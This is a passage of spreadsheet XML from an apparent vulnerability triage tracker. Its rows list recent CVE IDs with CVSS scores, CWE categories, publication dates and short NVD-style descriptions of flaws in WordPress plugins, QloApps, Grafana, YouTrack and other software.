      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102134</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102399</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="inlineStr"/>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Photo Gallery by Supsystic &lt;= 1.21.0 versions.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102399</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103539</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="inlineStr"/>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in ZongXR SuperMarket 1.0.0.0. This affects the function startBuy of the file instant-buy/src/main/java/com/supermarket/instantbuy/controller/InstantBuyController.java of the component Instant Buy. Executing a manipulation of the argument Username can lead to missing authentication. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103539</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103587</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="inlineStr"/>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the back-office Hotel Reservation System Book Now search, where date_to and id_room_type parameters are copied into template variables without validation. Attackers can craft a malicious link containing JavaScript payload in these parameters that executes in an authenticated administrator's session when the victim follows the link.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103587</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103588</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the exceptions field of the back-office Transplant a module form. Attackers can craft a malicious link containing JavaScript payload in the exceptions parameter that executes in an authenticated administrator's session when the victim follows the link.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103588</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103589</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the back-office room type editor that fails to escape room_num, floor, and comment field values in input attributes. Attackers can induce authenticated back-office users to submit crafted POST requests with malicious payloads to execute arbitrary JavaScript in the victim's administrative session.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103589</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103590</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the back-office room type editor's length of stay fields. Attackers can induce authenticated administrators to submit crafted POST requests with malicious payloads in restriction_min_los and restriction_max_los parameters, executing arbitrary JavaScript in the victim's administrative session.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103590</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12241</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr">
        <is>
          <t>aws, gin</t>
        </is>
      </c>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>The Advanced Woo Labels – Product Labels &amp; Badges for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to an improperly secure capability check on the 'save_meta_boxes' function in all versions up to, and including, 2.51. This makes it possible for authenticated attackers, with Contributor-level access and above, to create AWS labels that are rendered without proper escaping. The vulnerability was partially patched in version 2.46.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12241</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13720</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="inlineStr"/>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-345, CWE-915</t>
        </is>
      </c>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>An Editor can set file-provisioning metadata (the grafana.app/managedBy, grafana.app/managerId and grafana.app/sourcePath annotations) when creating a dashboard through the dashboard API, because these fields were stored without an authorization check. The dashboard then appears file-provisioned, and administrators can no longer update or delete it through Grafana. The impact is limited to the same organization and no data is exposed.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13720</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62081</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Flexible PDF Coupons &lt;= 1.14.11 versions.</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62081</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62083</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <t>Subscriber Other Vulnerability Type in Creator LMS &lt;= 1.2.19 versions.</t>
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62083</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94173</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Business Directory &lt;= 6.4.27 versions.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94173</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96450</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in pixfort Core &lt; 4.3.3 versions.</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96450</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97243</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in AllAble Connector &lt;= 0.13.4 versions.</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97243</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97285</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>Contributor Broken Access Control in The Events Calendar &lt;= 6.17.5 versions.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97285</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97299</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Razorpay Payment Links for WooCommerce &lt;= 2.1.5 versions.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97299</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100260</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 mailbox integration allowed authentication after a password reset</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100260</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100508</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Denial of Service Attack in Two Factor &lt;= 0.16.0 versions.</t>
        </is>
      </c>
